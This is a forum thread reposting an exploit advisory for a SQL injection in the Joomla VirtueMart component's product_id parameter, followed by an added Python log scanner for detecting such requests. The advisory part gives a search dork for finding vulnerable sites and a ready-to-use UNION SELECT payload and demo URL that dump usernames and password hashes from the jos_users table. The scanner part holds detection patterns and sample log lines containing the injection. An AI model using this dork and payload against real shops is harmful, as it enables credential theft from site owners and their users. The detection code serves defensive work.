Joomla Component com_virtuemart SQL injection vulnerability (product_id)
22-02-2010 06:28 PM Joomla Component com_virtuemart SQL i...
ysufv
# Title: Joomla Component com_virtuemart SQL injection vulnerability (product_id)
# EDB-ID: 10407
# CVE-ID: ()
# OSVDB-ID: ()
# Author: SOA Crew
# Published: 2009-12-13
# Verified: no
[#] Title:
Joomla Component com_virtuemart SQL injection vulnerability (product_id)

[#] Author:
SOA Crew a.k.a Neo-GabrieL
[gabriel_666@rocketmail.com]
visit us:
http://indonesianhacker.com/
or me @ http://neogabriel.soldiersofallah.org

**********************************/

[#] Software Information
Vendor : http://virtuemart.net/
Download : -
Version : 1.0
Vulnerability : SQL injection
Dork : inurl:"com_virtuemart"
Price : Free
Date : 07-12-09
================================================

[#] Vulnerable
http://localhost/index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SOA injection]

[#] Exploit
6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users--

[#] Ex. Query
+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1-

[#] Live Demo
http://site.com/index.php?page=shop.product_details&flypage=shop.flypage&product_id=6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1

**********************************/
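
For defenders reviewing web server logs for this issue, the following is an added example (not part of the original post or the advisory). It flags requests whose product_id is not a plain integer, assuming legitimate product_id values are always numeric and that logs use the Apache/Nginx combined format; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate product_id values are plain integers.
NUMERIC_ID = re.compile(r"\d{1,10}")
SQL_TOKENS = re.compile(r"\b(union|select|concat|from|limit)\b|--|0x[0-9a-f]+", re.I)
# Request line inside a "combined" format log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Dec/2009:10:01:02 +0000] "GET /index.php?page=shop.product_details'
    '&flypage=shop.flypage&product_id=6995&option=com_virtuemart&Itemid=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Dec/2009:10:02:11 +0000] "GET /index.php?page=shop.product_details'
    '&product_id=6995+union+select+1,2,3+from+jos_users--&option=com_virtuemart HTTP/1.1" 200 5300',
    '203.0.113.9 - - [07/Dec/2009:10:02:15 +0000] "GET /index.php?page=shop.product_details'
    '&product_id=6995%20UNION%20SELECT%201&option=com_virtuemart HTTP/1.1" 200 5300',
    '198.51.100.4 - - [07/Dec/2009:10:03:40 +0000] "GET /index.php?page=shop.product_details'
    '&product_id=12abc&option=com_virtuemart HTTP/1.1" 200 4100',
]

def suspicious_product_ids(line):
    """Return [(decoded_value, reason)] for every non-integer product_id in one log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    # parse_qs URL-decodes values, so "+" and "%20" both become spaces.
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    findings = []
    for value in params.get("product_id", []):
        if NUMERIC_ID.fullmatch(value):
            continue
        reason = "sql-keywords" if SQL_TOKENS.search(value) else "non-numeric"
        findings.append((value, reason))
    return findings

def scan(lines):
    """Return [(line_number, reason, decoded_value)] for all suspicious requests."""
    hits = []
    for number, line in enumerate(lines, 1):
        for value, reason in suspicious_product_ids(line):
            hits.append((number, reason, value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule can be enforced at a WAF or in the application before the value reaches the query.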
 
24-02-2010 12:23 AM RE: Joomla Component com_virtuemart SQL i...
EVA-00
Hey, isn't this an old bug, bro, from 2009? But that's fine, keep posting, OK. ;)
The Prophet Muhammad SAW said: "Whoever practices the knowledge he knows, Allah will give him knowledge he does not yet know" (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 